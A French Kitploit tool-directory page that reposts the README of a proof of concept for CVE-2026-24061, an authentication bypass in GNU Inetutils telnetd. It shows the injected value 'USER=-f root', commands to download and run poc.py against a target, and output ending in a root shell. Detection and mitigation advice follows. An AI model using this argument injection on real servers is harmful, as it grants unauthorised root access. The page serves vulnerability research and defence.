Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-24061-Telnetd — CVE-2026-24061 Contournement de l'authentification Telnetd de GNU Inetutils | Kitploit
Outils/GitHubGitHub/ish3ng0m4/cve-2026-24061-telnetd
Analyse des VulnérabilitésExploitationTests d'IntrusionAuthentificationApprentissage et ÉducationOutil d'Accès à Distance
GitHubish3ng0m4/cve-2026-24061-telnetd

CVE-2026-24061-Telnetd

CVE-2026-24061 Contournement de l'authentification Telnetd de GNU Inetutils

Voir le dépôt
il y a 6h 2mPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-24061
Contournement d'authentification Telnetd GNU Inetutils

CVE : CVE-2026-24061
Sévérité : Critique
CVSS : 9,8 (Critique)
CWE : CWE-88 — Neutralisation inappropriée des délimiteurs d'arguments dans une commande
Composant concerné : telnetd GNU Inetutils
Versions concernées : 1.9.3 à 2.7

Présentation

CVE-2026-24061 est une vulnérabilité critique de contournement d'authentification dans l'implémentation du serveur Telnet fournie par GNU Inetutils. La vulnérabilité provient d'une validation insuffisante de la variable d'environnement USER contrôlée par le client lorsque la connexion automatique Telnet est activée. Une valeur malveillante peut être interprétée comme une option du programme login système plutôt que comme un nom d'utilisateur. Dans des configurations vulnérables, un attaquant distant non authentifié peut abuser de ce comportement pour invoquer login avec l'option -f et contourner l'authentification, obtenant potentiellement un shell avec les privilèges du compte demandé.

Lorsque le service Telnet concerné s'exécute avec les privilèges root, une exploitation réussie peut entraîner un accès root distant non authentifié.

Description technique

Le flux d'exécution vulnérable peut être résumé comme suit :

root@kitploit:~
 Client Telnet
      │
      │ USER=-f root
      ▼
    telnetd
      │
      │ construit les arguments de login
      ▼
 login -f root
      │
      │ contournement d'authentification
      ▼
 shell root

Le problème est déclenché par l'interaction entre la fonctionnalité de connexion automatique de Telnet et le traitement de la variable d'environnement USER.

La valeur contrôlée par l'attaquant :

root@kitploit:~
 -f root

n'est pas strictement traitée comme un nom d'utilisateur. Au lieu de cela, elle peut devenir un argument de login, ce qui entraîne un comportement équivalent à :

root@kitploit:~
 login -f root

L'option -f demande à login de contourner le processus d'authentification normal pour l'utilisateur spécifié.

Preuve de concept PoC

Le dépôt comprend une preuve de concept en Python 3 qui effectue la connexion Telnet, gère la négociation de protocole requise, injecte la valeur USER malveillante et vérifie la session résultante.

Cloner le dépôt (recommandé)

root@kitploit:~
 git clone https://github.com/Ish3ng0m4/CVE-2026-24061-Telnetd.git
 cd CVE-2026-24061-Telnetd
 chmod +x poc.py
 python3 poc.py <CIBLE> <PORT>

Télécharger uniquement poc.py

root@kitploit:~
 wget https://raw.githubusercontent.com/Ish3ng0m4/CVE-2026-24061-Telnetd/main/poc.py

Utilisation

Rendre le PoC exécutable :

root@kitploit:~
 chmod +x poc.py

L'exécuter en fournissant l'adresse cible et le port Telnet :

root@kitploit:~
 python3 poc.py <CIBLE> <PORT>

Exemple :

root@kitploit:~
 python3 poc.py 127.0.0.1 23

Exploitation réussie

Une cible vulnérable produit une sortie similaire à :

CVE-2026-24061 - Contournement d'authentification telnetd GNU Inetutils

root@kitploit:~
 [*] Cible : 127.0.0.1:23
 [+] Connecté
 [*] USER=-f root injecté
 
 [+] VULNÉRABLE

Le PoC fournit ensuite une session interactive.

L'élévation de privilèges peut être confirmée avec :

root@kitploit:~
 id

Résultat attendu :

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

Cela confirme que le mécanisme d'authentification Telnet a été contourné et que la session résultante dispose des privilèges root.

Flux de travail du PoC

L'exploit effectue les opérations suivantes :

Se connecte au service Telnet cible. Effectue la négociation de protocole Telnet requise. Active le comportement de connexion automatique nécessaire à l'exploitation. Fournit la valeur malveillante USER=-f root. Permet à l'implémentation telnetd vulnérable de transmettre la valeur manipulée à login. Reçoit la session résultante. Fournit un terminal interactif à l'opérateur.

Le PoC ne repose pas sur des identifiants pour le chemin d'authentification vulnérable.

Configurations concernées

L'exploitation dépend de la configuration cible et de l'interaction entre telnetd et l'implémentation login du système.

Les conditions principales sont :

telnetd GNU Inetutils dans la plage de versions concernée.
Service Telnet accessible à l'attaquant.
Fonctionnalité de connexion automatique activée ou disponible.
Traitement vulnérable de la variable d'environnement USER.
Une implémentation login compatible capable d'interpréter l'option injectée.

Par conséquent, la présence d'une version Inetutils concernée seule ne doit pas être considérée comme une preuve d'exploitabilité. Les correctifs de distribution et la configuration du service doivent également être pris en compte.

Impact

CVE-2026-24061 peut compromettre complètement un système vulnérable.

Selon les privilèges sous lesquels telnetd s'exécute, l'exploitation peut fournir :

Contournement d'authentification
Accès non autorisé à un compte local
Exécution de commandes à distance
Élévation de privilèges
Accès de niveau root
Compromission complète du système

Le scénario à plus haut risque est un service Telnet accessible à distance où l'exploitation aboutit à une session root.

Détection

Les indicateurs potentiels d'exploitation incluent :

Connexions inattendues vers TCP/23.
Tentatives d'authentification Telnet utilisant des noms d'utilisateur inhabituels.
Valeurs USER suspectes commençant par des options de ligne de commande.
Arguments de processus login inattendus.
Sessions root provenant de telnetd.
Processus inattendus générés par le service Telnet.

La surveillance réseau doit également identifier les systèmes exposant inutilement des services Telnet.

Atténuation

La réponse recommandée est de supprimer Telnet et d'utiliser SSH pour l'administration à distance.

Si Telnet ne peut pas être supprimé immédiatement :

Mettre à niveau vers une version fournie par le fournisseur contenant le correctif de sécurité.
Appliquer la mise à jour de sécurité appropriée du système d'exploitation.
Restreindre TCP/23 aux réseaux de gestion de confiance.
Empêcher l'exposition directe de Telnet aux réseaux non fiables.
Surveiller l'authentification Telnet et l'activité des processus.

Étant donné que les distributions Linux peuvent rétroporter des correctifs de sécurité sans modifier le numéro de version en amont, les administrateurs doivent vérifier l'état de sécurité de leur paquet de distribution plutôt que de se fier uniquement à la version affichée.

Validation

La vulnérabilité a été reproduite avec succès contre un service Telnet GNU Inetutils vulnérable exécuté sur Ubuntu 22.04.5 LTS.

Le PoC a établi une connexion vers TCP/23, a injecté :

root@kitploit:~
 USER=-f root

et a obtenu une session root.

La vérification des privilèges a renvoyé :

root@kitploit:~
 uid=0(root) gid=0(root) groups=0(root)

Cela fournit une confirmation directe de l'impact sur la sécurité.

Avertissement

Cette preuve de concept est fournie à des fins de recherche en sécurité, de validation de vulnérabilités, de tests d'intrusion autorisés et à des fins éducatives.

Testez uniquement les systèmes pour lesquels vous disposez d'une autorisation explicite.

Gabriel D. Ishengoma
Sécurité offensive · Recherche en cybersécurité · Criminalistique numérique

Télécharger l’outil